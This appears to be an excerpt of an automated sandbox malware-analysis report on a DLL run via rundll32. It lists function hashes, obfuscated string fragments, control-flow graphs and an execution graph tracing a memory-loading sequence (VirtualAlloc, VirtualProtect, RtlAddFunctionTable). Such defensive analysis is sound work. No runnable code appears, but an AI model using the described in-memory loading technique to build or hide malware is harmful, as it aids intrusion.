                                                                                                                                      • Instruction ID: 97d266913d6b0fd63d839b3c54903fd41a2ccd22a8a26fffcb9587bfe3b6431f
                                                                                                                                      • Opcode Fuzzy Hash: 6c4ff939f0d35883aefbb319d4430fd67387b4e339adb0f797cabce8c6a4bf31
                                                                                                                                      • Instruction Fuzzy Hash: C8B1E17151A384ABD788CF28C1C994BBBE1FBD4754F906A1DF8C68B260D7B0D948CB02
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.282340341.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 9400724a362ecc304d993d2fe4c896d101fab294f6d1cf34a07a96bc2a8ce181
                                                                                                                                      • Instruction ID: 281782cf28aa09d34d334260f991d1b96cfbd8271b51b9b7c31761fd0664cb75
                                                                                                                                      • Opcode Fuzzy Hash: 9400724a362ecc304d993d2fe4c896d101fab294f6d1cf34a07a96bc2a8ce181
                                                                                                                                      • Instruction Fuzzy Hash: 4B51EC715087889BCBB8DF18C9856CA7BF0FF95704F50891DE9898B250DF719A44DB42
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 358 180022010-18002203b 359 18002203d-180022043 358->359 360 180022338-1800223a1 call 18001455c 359->360 361 180022049-18002204f 359->361 368 1800223a6-1800223ac 360->368 362 180022055-18002205b 361->362 363 18002232e-180022333 361->363 366 180022061-180022067 362->366 367 1800222be-180022329 call 180019cb4 362->367 363->359 370 180022069-18002206f 366->370 371 18002209a-1800222b9 call 18001dbe8 call 180012320 call 1800194a4 366->371 367->359 368->359 372 1800223b2-1800223c2 368->372 370->368 375 180022075-180022083 370->375 371->368 376 180022089-18002208d 375->376 378 180022085-180022086 376->378 379 18002208f-180022098 376->379 378->376 379->359
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.282340341.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: "+H$1l7.$M8;$]$d$]k$]k$94
                                                                                                                                      • API String ID: 0-2447245168
                                                                                                                                      • Opcode ID: 3fd6bef9004380659c47559ba6e3d81fe5eea7f701e849f333ef0deba45e7d13
                                                                                                                                      • Instruction ID: 1221e244f5383d3e6569bf50eb566ee92e7d288cf12f4405919b94e37960c7a7
                                                                                                                                      • Opcode Fuzzy Hash: 3fd6bef9004380659c47559ba6e3d81fe5eea7f701e849f333ef0deba45e7d13
                                                                                                                                      • Instruction Fuzzy Hash: 3FB10D7160130CCBDBA9DF28C18A6DA3BE1FF48748F114129FD1A97261D774E919CB46
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 568 1800059b8-180005a02 569 180005a04-180005a09 568->569 570 180006107-1800061a6 call 180001b1c 569->570 571 180005a0f-180005a14 569->571 581 1800061ab-1800061b0 570->581 572 180005a1a-180005a1f 571->572 573 180005fcd-180006102 call 180016314 571->573 577 180005a25-180005a2a 572->577 578 180005da6-180005fb1 call 1800093f0 572->578 573->569 579 1800061bb-18000625a call 180001b1c 577->579 580 180005a30-180005a35 577->580 593 180005fc3-180005fc8 578->593 594 180005fb3-180005fbe 578->594 587 18000625f-180006271 579->587 584 180005a3b-180005a40 580->584 585 180005d7e-180005d8c 580->585 586 1800061b6 581->586 581->587 590 180005a46-180005a4b 584->590 591 180005b78-180005d79 call 180009f5c call 18000a62c call 1800194a4 584->591 592 180005d92-180005d96 585->592 586->569 595 180005a51-180005a56 590->595 596 180005ad8-180005b68 call 18000abac 590->596 591->569 597 180005d98-180005da1 592->597 598 180005d8e-180005d8f 592->598 593->569 594->569 595->581 600 180005a5c-180005ad3 call 180007958 595->600 596->587 607 180005b6e-180005b73 596->607 597->569 598->592 600->569 607->569
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.282340341.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: -!zt$Mv`b$R3T$d}9J$t:v$ru
                                                                                                                                      • API String ID: 0-2100131636
                                                                                                                                      • Opcode ID: e0551372703c1c57f1fc0d9d1de0f1be02ef62f192bed394747547d409ac2d0a
                                                                                                                                      • Instruction ID: abddbd47ac15f5a8ffacaf8e31a06efd054a3dbd2afb1a66e8bbaa14beb483a4
                                                                                                                                      • Opcode Fuzzy Hash: e0551372703c1c57f1fc0d9d1de0f1be02ef62f192bed394747547d409ac2d0a
                                                                                                                                      • Instruction Fuzzy Hash: C1221BB050478C8BDBB8CF64C9897DD7BB0FB44308F10862DDA5AAB250CBB45686CF59
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 611 180013780-1800137f4 call 1800142a0 614 1800137fb-180013800 611->614 615 180013806-18001380b 614->615 616 180013c55-180013ce4 call 18002620c 614->616 617 180013811-180013816 615->617 618 180013c4b-180013c50 615->618 625 180013ce6-180013ceb 616->625 626 180013cf0 616->626 620 18001381c-180013821 617->620 621 1800138cd-180013c46 call 180006664 call 18000bb28 call 18002a6c8 call 1800194a4 617->621 618->614 623 180013cf5-180013cfa 620->623 624 180013827-1800138a9 call 18000290c 620->624 621->614 629 1800138ae-1800138cc 623->629 630 180013d00 623->630 624->629 625->614 626->623 630->614
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.282340341.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: $$"`2$lbzZ$lmq$tro$kO
                                                                                                                                      • API String ID: 0-2401169580
                                                                                                                                      • Opcode ID: b22a75222821f6640e36d1476563fd6974371582067e8c17588d676730c46316
                                                                                                                                      • Instruction ID: 279b0f6eedbbacd77816cba7ac57bf6919de5fbe0bc464da326619847ce4fcd1
                                                                                                                                      • Opcode Fuzzy Hash: b22a75222821f6640e36d1476563fd6974371582067e8c17588d676730c46316
                                                                                                                                      • Instruction Fuzzy Hash: BBF1C3709047488FDBA8DFA8D9867DDBBB1FB48304F20821DD84AEB255DB749A49CF41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.282340341.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: )#?$EX.$PT$UbA$2f
                                                                                                                                      • API String ID: 0-1318892062
                                                                                                                                      • Opcode ID: f9a85fa51538b1a6c0e22373df85dddbbc427f24166f886711afb0f01761c199
                                                                                                                                      • Instruction ID: a9b5704be98d3dd027f678fe08c59eda011257bdda9cf4ed25ea0f7660729633
                                                                                                                                      • Opcode Fuzzy Hash: f9a85fa51538b1a6c0e22373df85dddbbc427f24166f886711afb0f01761c199
                                                                                                                                      • Instruction Fuzzy Hash: 8B320DB190078C8BDBB8CF64C8856DD7BF0FB48318F50852DEA1A9B251DBB45685CF98
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 676 18001fc0c-18001fc44 call 1800142a0 679 18001fc46-18001fc4b 676->679 680 18001fc51 679->680 681 18001ff13-18001ff18 679->681 682 18001fe94-18001ff0e call 180012598 680->682 683 18001fc57-18001fc5c 680->683 684 180020169-1800201f9 call 1800190d4 681->684 685 18001ff1e-18001ff23 681->685 682->679 687 18001fc62-18001fc67 683->687 688 18001fde5-18001fe8f call 180012598 683->688 702 1800201fe-180020203 684->702 689 1800200b6-180020164 call 180012598 685->689 690 18001ff29-18001ff2e 685->690 695 18002020a-18002026b call 1800190d4 687->695 696 18001fc6d-18001fc72 687->696 688->679 689->679 698 1800200a1-1800200b1 call 1800014f8 690->698 699 18001ff34-18001ff39 690->699 711 180020270-180020291 695->711 706 18001fc78-18001fc7d 696->706 707 18001fd57-18001fde0 call 180012598 696->707 698->679 700 180020003-180020091 call 180021434 699->700 701 18001ff3f-18001ff44 699->701 700->711 723 180020097-18002009c 700->723 701->702 709 18001ff4a-18001fffe call 180012598 701->709 710 180020205 702->710 702->711 715 18001fc83-18001fc88 706->715 716 18001fd1f-18001fd52 706->716 707->679 709->679 710->679 715->702 720 18001fc8e-18001fd1a call 18001e938 715->720 716->679 720->679 723->679
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.282340341.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: $T$?F$QP|m$qjf$tZp
                                                                                                                                      • API String ID: 0-3477398917
                                                                                                                                      • Opcode ID: a2afc25ca6c2e6ca488c7a804df3743aa45b21aa43371557c2da8ddda12b60f7
                                                                                                                                      • Instruction ID: e54beaa769b94aae3cb673a52a2b60ade73482c6e5d3d936cdc9b6ae13d51efd
                                                                                                                                      • Opcode Fuzzy Hash: a2afc25ca6c2e6ca488c7a804df3743aa45b21aa43371557c2da8ddda12b60f7
                                                                                                                                      • Instruction Fuzzy Hash: 0B122870A0470CDFCF69DFA8C08A6DDBBF2FB44344F1091A9E816AB261D7759A19CB41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.282340341.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: JQ$k&($t$v$x\J
                                                                                                                                      • API String ID: 0-1134872184
                                                                                                                                      • Opcode ID: e2b118cac14b957c819117e18deb076f69f9d4e25580e92a2151fd03385e5a66
                                                                                                                                      • Instruction ID: 7c1fd17b310acde7e359d6be57bcfb6c2dd011f2caef592e77d3cba241376f6b
                                                                                                                                      • Opcode Fuzzy Hash: e2b118cac14b957c819117e18deb076f69f9d4e25580e92a2151fd03385e5a66
                                                                                                                                      • Instruction Fuzzy Hash: F312E0B0504709EFCB99DF28C18AADE7BF0FB48308F40812AF80A9B254D774DA58DB45
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.282340341.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: R$)H8$?rIc$L==$V
                                                                                                                                      • API String ID: 0-2512384441
                                                                                                                                      • Opcode ID: 0d280c2f9ee604a9d8763362a2e2c249d7a205bc5c068130deea404b5e8e02a7
                                                                                                                                      • Instruction ID: 6f6f9af97a41f07aad9f9d1cbd67af5334817a93c453241fb2a5d498ae2065c2
                                                                                                                                      • Opcode Fuzzy Hash: 0d280c2f9ee604a9d8763362a2e2c249d7a205bc5c068130deea404b5e8e02a7
                                                                                                                                      • Instruction Fuzzy Hash: 3541D0B090074E8BCF48CF64D49A5DE7FB0FB68398F20421DE856A6250D3B896A5CFC5
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.282340341.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: Qq$bt$vird$+$S
                                                                                                                                      • API String ID: 0-3373980505
                                                                                                                                      • Opcode ID: 46bb33aa035ecbbdf74cf68df8db4d7c020810c30b71dbb4fbdebc27907f7b4b
                                                                                                                                      • Instruction ID: 8c34661c01ca41a1498f33dadfb9b2381b3c020394efcb6cfebc1cbd8490f91c
                                                                                                                                      • Opcode Fuzzy Hash: 46bb33aa035ecbbdf74cf68df8db4d7c020810c30b71dbb4fbdebc27907f7b4b
                                                                                                                                      • Instruction Fuzzy Hash: 8831C2B081038A8FDB45CF64C88A5DE7BF0FB58358F115A19F869A6250D3B4D668CF81
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.282340341.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: V$@$P9$^_"
                                                                                                                                      • API String ID: 0-1880944046
                                                                                                                                      • Opcode ID: 14fe4b6354f8c882e246ec0bcf45ce0c6e4a33b057813c2d4cef38f5cb1d7b15
                                                                                                                                      • Instruction ID: ef3f81825b514374c5d287d432cdf068934c0dc0259921085eace1de493a05f6
                                                                                                                                      • Opcode Fuzzy Hash: 14fe4b6354f8c882e246ec0bcf45ce0c6e4a33b057813c2d4cef38f5cb1d7b15
                                                                                                                                      • Instruction Fuzzy Hash: B6F1DF70504749EFCB98CF28D18AACE7BE0FB48348F50812AF81A9B264D770DA59DB45
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.282340341.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: =_$F)k$b/$syG
                                                                                                                                      • API String ID: 0-3955183656
                                                                                                                                      • Opcode ID: a0c8fbb251499c36d1c33fbfac3bbb926034851086b3556ae4bae43476727e6a
                                                                                                                                      • Instruction ID: 3a63fdd7148b145f5d2717dabea2a2fa508061acbcc25a132c341bfe6e9ad30f
                                                                                                                                      • Opcode Fuzzy Hash: a0c8fbb251499c36d1c33fbfac3bbb926034851086b3556ae4bae43476727e6a
                                                                                                                                      • Instruction Fuzzy Hash: DED12771A0478D8BCF59DFA8C88A6EEBBB0FB48344F10421DE846A7650D7B4D909CF85
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.282340341.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: #X$'Xsa$iJ6$vG
                                                                                                                                      • API String ID: 0-746338152
                                                                                                                                      • Opcode ID: 05ea12fd72043b3df7b90193803f13f9b9661e31632ee757fcd333ad07ef3f6f
                                                                                                                                      • Instruction ID: 8ba50615c78112980223cca8f04f1fa67c4b69ee5a809e4e0bd2b8ae6832a1bb
                                                                                                                                      • Opcode Fuzzy Hash: 05ea12fd72043b3df7b90193803f13f9b9661e31632ee757fcd333ad07ef3f6f
                                                                                                                                      • Instruction Fuzzy Hash: 93E154B590070DDFCB88DF68D19A9DD7BB9BB49308F404029FC0E9A264D3B4E919CB56
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.282340341.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: *i^$MIC$-Z$]2
                                                                                                                                      • API String ID: 0-498664264
                                                                                                                                      • Opcode ID: db11ef6343568e39e87295be28a4fb69218d9fc865c563580501f4fd78a225ea
                                                                                                                                      • Instruction ID: 9792ecb135b2155067e966d5e38dbf4f409fde80c29e70d57d2078ebe1ce15c6
                                                                                                                                      • Opcode Fuzzy Hash: db11ef6343568e39e87295be28a4fb69218d9fc865c563580501f4fd78a225ea
                                                                                                                                      • Instruction Fuzzy Hash: 10E1C670109B888FDBF8DF64CC86BEB7BA5FB44346F10651DD84A8A290DBB46645CF41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.282340341.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: B$EG$QsF$_
                                                                                                                                      • API String ID: 0-784369960
                                                                                                                                      • Opcode ID: 2411b4f18f6ae95c167793a9182b69dfaeb4b2ef39c1ac24af76ef798b153418
                                                                                                                                      • Instruction ID: 62dbbc71664ee0946fffbba3b71afe09b12d9ffe0d1744d6deb9db65ff0cd9cc
                                                                                                                                      • Opcode Fuzzy Hash: 2411b4f18f6ae95c167793a9182b69dfaeb4b2ef39c1ac24af76ef798b153418
                                                                                                                                      • Instruction Fuzzy Hash: 3FB1387010468D8FDF88DF28C88A6DA3FA1FB68388F614219FC4A97250C778D694CBC5
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.282340341.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: -`G$.$5B.Y$Z`35
                                                                                                                                      • API String ID: 0-1363032466
                                                                                                                                      • Opcode ID: bf60aa8e83620137796280cd5bd0e9d08ed9dd04dd302297e234b85e3718d0fd
                                                                                                                                      • Instruction ID: b244d414363a4385de25ad5610b22aaac7fb2f2c92cf8150697ad32e565f4bd8
                                                                                                                                      • Opcode Fuzzy Hash: bf60aa8e83620137796280cd5bd0e9d08ed9dd04dd302297e234b85e3718d0fd
                                                                                                                                      • Instruction Fuzzy Hash: 29A1FB716157888FEB7ADF24C89A7CE7BE1FB49308F40461DD98E8A250D7B49609CB42
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.282340341.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: *+_$WSh$\O$#o
                                                                                                                                      • API String ID: 0-1846314129
                                                                                                                                      • Opcode ID: 2b55738af9202b4623c877c52658b874745984570bac3296ae94d1111b904a17
                                                                                                                                      • Instruction ID: 175ce4bc0e22c7a636d32034be2bbb8ad42f6b3cb6a748f64f507b7f0b29ed37
                                                                                                                                      • Opcode Fuzzy Hash: 2b55738af9202b4623c877c52658b874745984570bac3296ae94d1111b904a17
                                                                                                                                      • Instruction Fuzzy Hash: 1971167160474ECFCB98DF18C489ADA3BE1FB58318F414529FC09A7264DB74DAA8CB85
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.282340341.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: .B$O$M*K$\<
                                                                                                                                      • API String ID: 0-3225238681
                                                                                                                                      • Opcode ID: 97d1f14c936b4c6fd28126f9270f10017570076f2259e30e0790da2a5d8d89f7
                                                                                                                                      • Instruction ID: 95d2fbb8f7fe970b1359d27f41ccd6aad584115d4fee043204e0c0f4c3f3b287
                                                                                                                                      • Opcode Fuzzy Hash: 97d1f14c936b4c6fd28126f9270f10017570076f2259e30e0790da2a5d8d89f7
                                                                                                                                      • Instruction Fuzzy Hash: 7181E370549788CFEBBACF24C886BDE7BE4FB48744F20461DE85A8A260DB709645CF41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.282340341.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: $$$$xVO$~O
                                                                                                                                      • API String ID: 0-3655128719
                                                                                                                                      • Opcode ID: f0a1fe130e7a88269555c94ae3afa6992adf671055acde803b367a0cf8dc4998
                                                                                                                                      • Instruction ID: 8f78542db34460f4381821bab2b7e4f68a699ed7f8b2fc47c959991f0b02677a
                                                                                                                                      • Opcode Fuzzy Hash: f0a1fe130e7a88269555c94ae3afa6992adf671055acde803b367a0cf8dc4998
                                                                                                                                      • Instruction Fuzzy Hash: 5B61D1B05187448FD369DF28C18965BBBF1FBC6744F008A1EF6868A260DB76D948CB47
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.282340341.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: ,IW$G$JMg$l
                                                                                                                                      • API String ID: 0-1370644289
                                                                                                                                      • Opcode ID: aa199bcfabd2ca119bc867395ae2bb0b970833e8ef3f83c28db76f19b2a25dac
                                                                                                                                      • Instruction ID: 7fb8b97fd43ed4dc52a467cdcf5cca41e6e56dbc92574a5c866222c6b731b82a
                                                                                                                                      • Opcode Fuzzy Hash: aa199bcfabd2ca119bc867395ae2bb0b970833e8ef3f83c28db76f19b2a25dac
                                                                                                                                      • Instruction Fuzzy Hash: 0A41D3B190074E8FCB48CF64C88A5DE7FB0FB18358F10461EE85AA6250D7B89695CFC9
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.282340341.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: ,$,$2S=$i`}G
                                                                                                                                      • API String ID: 0-4285990414
                                                                                                                                      • Opcode ID: 1704a5678c6fc7c63ed33a4399dbb19a0648d0f8b4dca33206a3e55e43de3fb6
                                                                                                                                      • Instruction ID: 665cb0e6160ce90faac3fa7baf9a16caae401c848b442bb7533a8cc1fd62885f
                                                                                                                                      • Opcode Fuzzy Hash: 1704a5678c6fc7c63ed33a4399dbb19a0648d0f8b4dca33206a3e55e43de3fb6
                                                                                                                                      • Instruction Fuzzy Hash: 4D41E57051CB848FD7B4DF18D486BDABBE0FB98750F40495EE48DC3251DBB0A8858B86
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Execution Graph

                                                                                                                                      Execution Coverage:55.8%
                                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                                      Signature Coverage:0%
                                                                                                                                      Total number of Nodes:11
                                                                                                                                      Total number of Limit Nodes:0
                                                                                                                                      execution_graph 162 164c80a0000 163 164c80a0183 162->163 164 164c80a043e VirtualAlloc 163->164 168 164c80a0462 164->168 165 164c80a0a7b 166 164c80a0531 GetNativeSystemInfo 166->165 167 164c80a056d VirtualAlloc 166->167 172 164c80a058b 167->172 168->165 168->166 169 164c80a0a00 169->165 170 164c80a0a56 RtlAddFunctionTable 169->170 170->165 171 164c80a09d9 VirtualProtect 171->172 172->169 172->171 172->172

                                                                                                                                      Callgraph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      • Opacity -> Relevance
                                                                                                                                      • Disassembly available
                                                                                                                                      callgraph 0 Function_00000164C80A0000 1 Function_00000164C80A0AA8 0->1

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
